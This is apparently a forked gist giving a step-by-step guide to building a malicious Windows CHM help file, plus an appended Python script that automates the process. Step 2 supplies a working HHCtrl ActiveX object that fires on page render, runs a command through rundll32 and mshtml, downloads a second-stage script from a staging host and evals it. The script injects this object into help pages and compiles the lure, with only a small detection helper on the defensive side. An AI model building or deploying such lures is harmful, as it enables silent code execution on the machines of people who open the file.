Malicious-CHM-Guide.md

Gist created by @mgeeky on Feb 6, 2018; forked by @askme765cs on February 25, 2021.

## Procedure for generating Malicious CHM file

- **Step 0:** Download and install [**Microsoft HTML Help Workshop and Documentation**](https://www.microsoft.com/en-us/download/details.aspx?id=21138)
- **Step 1:** Obtain a valid CHM file and unpack it using 7-zip
- **Step 2:** Find an entry-point HTML file within the "_docs_" directory and insert the following code into its `<body>` section. The `classid` is the HTML Help ActiveX control (HHCtrl.ocx); its `ShortCut` command launches the program given in `Item1` (format: `window-class,program,parameters`, with the window-class field left empty here), and `Item2` is the window message sent to trigger it (`273` = `WM_COMMAND`, then `wParam` and `lParam`). The trailing `x.Click()` fires the shortcut as soon as the page renders, without user interaction. The sample `Item1` copies `rundll32.exe` to `%TEMP%\out.exe`, then runs an inline `javascript:` URL through `mshtml`'s `RunHTMLApplication`, which fetches the second stage from `http://127.0.0.1:8000/test.vbs` with WinHttp and `eval`s it; the `catch` block kills `out.exe` if the download fails. Replace the URL with your own staging host, and note that because the response is passed to JScript's `eval`, the hosted file must be JScript regardless of its `.vbs` name:

```
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=',cmd.exe,/c copy /Y C:\Windows\system32\rundll32.exe %TEMP%\out.exe > nul && %TEMP%\out.exe javascript:"\..\mshtml RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1:8000/test.vbs",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im out.exe",0,true);}'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
```

- **Step 3:** Prepare a `Project.hhp` project file (HTML Help Workshop uses the `.hhp` extension) with contents like the below ones:

```
[OPTIONS]
Contents file=<PATH-TO-UNPACKED-CHM-DIRECTORY>\Table of Contents.hhc
[FILES]
<PATH-TO-UNPACKED-CHM-DIRECTORY>\docs\Malicious-File.htm
```

Add every file the CHM needs to the `[FILES]` section, including the HTM file modified in Step 2.


- **Step 4:** Compile the project from within the unpacked CHM directory using the `hhc.exe` compiler (HTML Help Compiler, installed with HTML Help Workshop):

```
<PATH-TO-UNPACKED-CHM-DIRECTORY> "C:\Program Files (x86)\HTML Help Workshop\hhc.exe" Project.hhp
Microsoft HTML Help Compiler 4.74.8702
Compiling <PATH-TO-UNPACKED-CHM-DIRECTORY>\Project.chm
Compile time: 0 minutes, 1 second
353 Topics
7,208 Local links
187 Internet links
2 Graphics
Created <PATH-TO-UNPACKED-CHM-DIRECTORY>\Project.chm, 817,791 bytes
Compression decreased file by 2,091,702 bytes.
```

- **Step 5:** PROFIT.
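The steps above are usually repeated for every new lure, so the following script automates Steps 2 to 4 on an already unpacked CHM directory: it injects the HHCtrl `ShortCut` object after the `<body>` tag of a topic page, writes a `.hhp` that lists every file under the directory (so nothing is missed in `[FILES]`), runs `hhc.exe` if it is installed, and, for the defender-side check, extracts the `Item1` command of any `ShortCut` object found in a page pulled out of a CHM. This is an added example, not code from the original gist. Assumptions beyond the page: the `.hhp` uses paths relative to its own location and adds a `Compiled file=` option to name the output; the default `hhc.exe` install path is the one HTML Help Workshop uses; `demo()` builds a constructed, minimal fake unpacked CHM (one `.hhc`, one `.htm`, one image) and uses a benign `,calc.exe,` stand-in instead of the guide's `cmd.exe` one-liner.

```python
"""Automate the guide's Steps 2-4 on an unpacked CHM directory (added example)."""
import os
import re
import subprocess
import tempfile
from pathlib import Path

# CLSID of the HTML Help ActiveX control (HHCtrl.ocx) used by the guide's OBJECT tag
HHCTRL_CLSID = "clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
# Default HTML Help Workshop install path (assumption; adjust for your box)
HHC_EXE = r"C:\Program Files (x86)\HTML Help Workshop\hhc.exe"


def shortcut_object(command, element_id="x"):
    """Build the <OBJECT> block from the guide. `command` is the Item1 value:
    'window-class,program,parameters' with the window-class field left empty."""
    return (
        f'<OBJECT id={element_id} classid="{HHCTRL_CLSID}" width=1 height=1>\n'
        '<PARAM name="Command" value="ShortCut">\n'
        '<PARAM name="Button" value="Bitmap::shortcut">\n'
        f"<PARAM name=\"Item1\" value='{command}'>\n"
        '<PARAM name="Item2" value="273,1,1">\n'  # WM_COMMAND (273), wParam, lParam
        "</OBJECT>\n"
        f"<SCRIPT>\n{element_id}.Click();\n</SCRIPT>\n"  # fires without user interaction
    )


def inject(htm_path, command):
    """Step 2: insert the object right after the opening <body ...> tag of a topic page."""
    htm_path = Path(htm_path)
    html = htm_path.read_text(encoding="utf-8", errors="replace")
    m = re.search(r"<body[^>]*>", html, flags=re.IGNORECASE)
    if not m:
        raise ValueError(f"no <body> tag in {htm_path}")
    patched = html[: m.end()] + "\n" + shortcut_object(command) + html[m.end():]
    htm_path.write_text(patched, encoding="utf-8")
    return patched


def write_project(chm_dir, contents_file="Table of Contents.hhc", name="Project"):
    """Step 3: write <name>.hhp listing every file under chm_dir (relative paths)."""
    chm_dir = Path(chm_dir)
    files = sorted(
        str(p.relative_to(chm_dir))
        for p in chm_dir.rglob("*")
        if p.is_file() and p.suffix.lower() not in (".hhp", ".chm")
    )
    hhp = chm_dir / f"{name}.hhp"
    hhp.write_text(
        "[OPTIONS]\n"
        f"Compiled file={name}.chm\n"      # assumption: name the output explicitly
        f"Contents file={contents_file}\n"
        "[FILES]\n" + "\n".join(files) + "\n",
        encoding="utf-8",
    )
    return hhp, files


def compile_chm(hhp_path, hhc=HHC_EXE):
    """Step 4: run hhc.exe when present (Windows only). Returns the produced .chm
    path, or None if the compiler is not installed or produced nothing."""
    if not os.path.exists(hhc):
        return None
    hhp_path = Path(hhp_path)
    # hhc.exe exits 1 on success and 0 on failure, so check for the output file instead
    subprocess.run([hhc, hhp_path.name], cwd=hhp_path.parent)
    out = hhp_path.with_suffix(".chm")
    return out if out.exists() else None


def find_shortcut_objects(html):
    """Defender-side check: return the Item1 command of every HHCtrl ShortCut
    object in a page extracted from a CHM (empty list when none is present)."""
    found = []
    obj_re = re.compile(r"<object\b[^>]*clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11[^>]*>(.*?)</object>", re.I | re.S)
    for obj in obj_re.finditer(html):
        body = obj.group(1)
        if re.search(r'name="Command"\s+value="ShortCut"', body, flags=re.I):
            item1 = re.search(r'name="Item1"\s+value=([\'"])(.*?)\1', body, flags=re.I | re.S)
            found.append(item1.group(2) if item1 else "")
    return found


def demo():
    """Build a constructed, minimal fake unpacked CHM and run the pipeline on it."""
    work = Path(tempfile.mkdtemp(prefix="chm-"))
    (work / "Table of Contents.hhc").write_text("<html><body><ul></ul></body></html>", encoding="utf-8")
    docs = work / "docs"
    docs.mkdir()
    (docs / "index.htm").write_text("<html><body>\n<h1>Help</h1>\n</body></html>", encoding="utf-8")
    (docs / "logo.gif").write_bytes(b"GIF89a")  # placeholder image, not a real GIF
    patched = inject(docs / "index.htm", ",calc.exe,")  # benign stand-in for the guide's payload
    hhp, files = write_project(work)
    return {
        "hhp_text": hhp.read_text(encoding="utf-8"),
        "files": files,
        "commands": find_shortcut_objects(patched),
        "compiled": compile_chm(hhp),  # None unless hhc.exe exists on this machine
    }


if __name__ == "__main__":
    print(demo())
```

Pointing `demo()` at a real unpacked CHM is a matter of replacing the constructed files with the directory from Step 1 and `,calc.exe,` with the `Item1` string from Step 2; `find_shortcut_objects` is the part worth keeping on the blue-team side, run over every `.htm`/`.html` that 7-zip extracts from a suspicious CHM.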